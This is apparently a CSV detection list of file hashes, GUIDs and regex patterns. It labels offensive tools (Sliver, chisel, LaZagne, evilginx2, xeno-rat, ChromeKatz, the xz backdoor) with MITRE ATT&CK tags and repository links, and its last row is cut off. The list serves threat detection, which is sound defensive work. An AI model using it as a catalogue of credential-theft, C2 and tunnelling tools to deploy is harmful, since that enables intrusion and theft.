"*309c23d800972611948a5980921fdf6e78bdda2fc4d30f4dba3bd8c970a17e94*",".{0,1000}309c23d800972611948a5980921fdf6e78bdda2fc4d30f4dba3bd8c970a17e94.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*30af65f777eba02b3484f6db7f91b66d465d4497cabf9dd35f7291d5a717a454*",".{0,1000}30af65f777eba02b3484f6db7f91b66d465d4497cabf9dd35f7291d5a717a454.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*30B8883F-A0A2-4256-ADCF-A790525D3696*",".{0,1000}30B8883F\-A0A2\-4256\-ADCF\-A790525D3696.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*30d2134d69653bfb682dd27c1d6e6e7121080c7e60409237fd15e38314a11bca*",".{0,1000}30d2134d69653bfb682dd27c1d6e6e7121080c7e60409237fd15e38314a11bca.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*30e5dea7e4567756d55f7bd13dfbbf4b12d9e585d8d47cd18c700fc632ffdff0*",".{0,1000}30e5dea7e4567756d55f7bd13dfbbf4b12d9e585d8d47cd18c700fc632ffdff0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6*",".{0,1000}30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*310d3ef0d6aedac04e40ec62115f8d44d06a57a058030cc1a99e2d6665187eb7*",".{0,1000}310d3ef0d6aedac04e40ec62115f8d44d06a57a058030cc1a99e2d6665187eb7.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*310FC5BE-6F5E-479C-A246-6093A39296C0*",".{0,1000}310FC5BE\-6F5E\-479C\-A246\-6093A39296C0.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*3112a8da28bf74a57ed30ef6ee827f6f832e3053db1ec04fc0f465b6e0c2f2d0*",".{0,1000}3112a8da28bf74a57ed30ef6ee827f6f832e3053db1ec04fc0f465b6e0c2f2d0.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*3150f104ac2f5f1eead627411f14fdc43e50e18aaba185cdfba03cd99475dfac*",".{0,1000}3150f104ac2f5f1eead627411f14fdc43e50e18aaba185cdfba03cd99475dfac.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3170917f0dbe26d4a09283394af0b9a9e9724589cd650d0b451b2c834aab3bf6*",".{0,1000}3170917f0dbe26d4a09283394af0b9a9e9724589cd650d0b451b2c834aab3bf6.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*3178ccb34c7dfd53d77a18d891bdc3d6376f5346746d65e6d386cc9c36040c39*",".{0,1000}3178ccb34c7dfd53d77a18d891bdc3d6376f5346746d65e6d386cc9c36040c39.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*31795b2f772b6ad00274cc4eb40aaf81b5d38d6eeae56bace80a07bbb1aeac35*",".{0,1000}31795b2f772b6ad00274cc4eb40aaf81b5d38d6eeae56bace80a07bbb1aeac35.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*3180a45a681653c3413afb788680f02754995a734bef851661056683691920e8*",".{0,1000}3180a45a681653c3413afb788680f02754995a734bef851661056683691920e8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae*",".{0,1000}319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*31fd2609d81f188c2a778d818c851f56d845d346036cd76283ae7c12d17f05cf*",".{0,1000}31fd2609d81f188c2a778d818c851f56d845d346036cd76283ae7c12d17f05cf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3204ad88f0f16fc276bde17e0cdb9c0144789b711e86da88599d193db09ce380*",".{0,1000}3204ad88f0f16fc276bde17e0cdb9c0144789b711e86da88599d193db09ce380.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*320fff4e8283c563cb74e5dc61fd68e4cb2743da27aae20d2b260c6c27e41f00*",".{0,1000}320fff4e8283c563cb74e5dc61fd68e4cb2743da27aae20d2b260c6c27e41f00.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*32223BE8-3E78-489C-92ED-7900B26DFF43*",".{0,1000}32223BE8\-3E78\-489C\-92ED\-7900B26DFF43.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" 
"*3243a9062544c25918f589d8dbc60e49295bb60cf906e10b532ae83f7ad8cc12*",".{0,1000}3243a9062544c25918f589d8dbc60e49295bb60cf906e10b532ae83f7ad8cc12.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*32A26CB8E0ECA88CA6116E467FC8BD5430E54133A5642ED1AFED8DCC2B9C9DFD*",".{0,1000}32A26CB8E0ECA88CA6116E467FC8BD5430E54133A5642ED1AFED8DCC2B9C9DFD.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*32abb6de73930ce62b7110f0834327b96444fb25939b2ffc4af153faac836d84*",".{0,1000}32abb6de73930ce62b7110f0834327b96444fb25939b2ffc4af153faac836d84.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*32ae965a0b8ea94499ffb0368ae4d5a349f84c5b37ba3cba1874d0bd73dc650c*",".{0,1000}32ae965a0b8ea94499ffb0368ae4d5a349f84c5b37ba3cba1874d0bd73dc650c.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*32ccdc0e660f56052d82e4e5788c7d555d7dfcf00d3949dfd98d69a9803619c0*",".{0,1000}32ccdc0e660f56052d82e4e5788c7d555d7dfcf00d3949dfd98d69a9803619c0.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*32CE1CB1-B7D9-416F-8EFE-6A0055867537*",".{0,1000}32CE1CB1\-B7D9\-416F\-8EFE\-6A0055867537.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*32d7996430dea9678208a61548f252f111eea644b325f9a7c2d1bce89e1cbf90*",".{0,1000}32d7996430dea9678208a61548f252f111eea644b325f9a7c2d1bce89e1cbf90.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*32e696d3b380f40adea08a359da80575df34f9130b392f10666fdff9e443769e*",".{0,1000}32e696d3b380f40adea08a359da80575df34f9130b392f10666fdff9e443769e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*32e852ed61681e0f498dfd901863b26277f5f0313e4469b4243991be4f3bea07*",".{0,1000}32e852ed61681e0f498dfd901863b26277f5f0313e4469b4243991be4f3bea07.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3318d1dd3fcab5f3e4ab3cc5b690a3f4*",".{0,1000}3318d1dd3fcab5f3e4ab3cc5b690a3f4.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*332346668c99d0c6bd383f9a0f6c32e7ea3cedf4788468d1d373d3f106f4469d*",".{0,1000}332346668c99d0c6bd383f9a0f6c32e7ea3cedf4788468d1d373d3f106f4469d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*33323e73135262eaea63742b1c638a42fd535238c2bf2e6baa1b42fb593b0ddd*",".{0,1000}33323e73135262eaea63742b1c638a42fd535238c2bf2e6baa1b42fb593b0ddd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*335628fdb196d750906961db6ce9ec4c35fb7c16f6883c441c6c620468e273c1*",".{0,1000}335628fdb196d750906961db6ce9ec4c35fb7c16f6883c441c6c620468e273c1.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*33571B09-4E94-43CB-ABDC-0226D769E701*",".{0,1000}33571B09\-4E94\-43CB\-ABDC\-0226D769E701.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*335ac01e952db33997b844a2e7c506d541e353d6e82ead3fde51e4879fde736a*",".{0,1000}335ac01e952db33997b844a2e7c506d541e353d6e82ead3fde51e4879fde736a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*337ED7BE-969A-40C4-A356-BE99561F4633*",".{0,1000}337ED7BE\-969A\-40C4\-A356\-BE99561F4633.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/Prepouce/CoercedPotato","1","0","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*337ED7BE-969A-40C4-A356-BE99561F4633*",".{0,1000}337ED7BE\-969A\-40C4\-A356\-BE99561F4633.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*33a286f3a77dd581011f646b2b96e6ac55f2d6a7cca7fdc3d4a0b45d063d912b*",".{0,1000}33a286f3a77dd581011f646b2b96e6ac55f2d6a7cca7fdc3d4a0b45d063d912b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*33a6ca1dea55d7cd2edc7d25de16ce7689fcfc7c51fb2f26ebe1a07a3c81c017*",".{0,1000}33a6ca1dea55d7cd2edc7d25de16ce7689fcfc7c51fb2f26ebe1a07a3c81c017.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" 
"*33b7357209a182696c26be19723b759608d453a6492e9ee57abf619c7c44de61*",".{0,1000}33b7357209a182696c26be19723b759608d453a6492e9ee57abf619c7c44de61.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*33BF8AA2-18DE-4ED9-9613-A4118CBFC32A*",".{0,1000}33BF8AA2\-18DE\-4ED9\-9613\-A4118CBFC32A.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*33c0ff5f78f090a28573baf8ad735c82728c289a7ddf80df5bbf90c794cd7f39*",".{0,1000}33c0ff5f78f090a28573baf8ad735c82728c289a7ddf80df5bbf90c794cd7f39.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*33c9dbfdd337a5fb8cc15a62bc9800d9a58799ccf21cb1b9bf3e7b7754c5eca2*",".{0,1000}33c9dbfdd337a5fb8cc15a62bc9800d9a58799ccf21cb1b9bf3e7b7754c5eca2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*33ccc2fca462fcf743513e4f01ebe3b7302e0158a44b8dfa1f3e56b78b3ff0be*",".{0,1000}33ccc2fca462fcf743513e4f01ebe3b7302e0158a44b8dfa1f3e56b78b3ff0be.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*33ff6cd5604aa7d47c048e328546a890a4e5eb1cbbb578aeb78c41454d449212*",".{0,1000}33ff6cd5604aa7d47c048e328546a890a4e5eb1cbbb578aeb78c41454d449212.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3404870416355a3fb4bf2d43695606b77785e6fbf534f2f6a536861ffcc9de81*",".{0,1000}3404870416355a3fb4bf2d43695606b77785e6fbf534f2f6a536861ffcc9de81.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*340ce55adab1112723a9947962c3557daeb2ed12fdb535f99dd8b66682356ebf*",".{0,1000}340ce55adab1112723a9947962c3557daeb2ed12fdb535f99dd8b66682356ebf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*340df9bf5aa4527010e535905f4e4926e70b7d6b7716491638a920c37d717a34*",".{0,1000}340df9bf5aa4527010e535905f4e4926e70b7d6b7716491638a920c37d717a34.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly 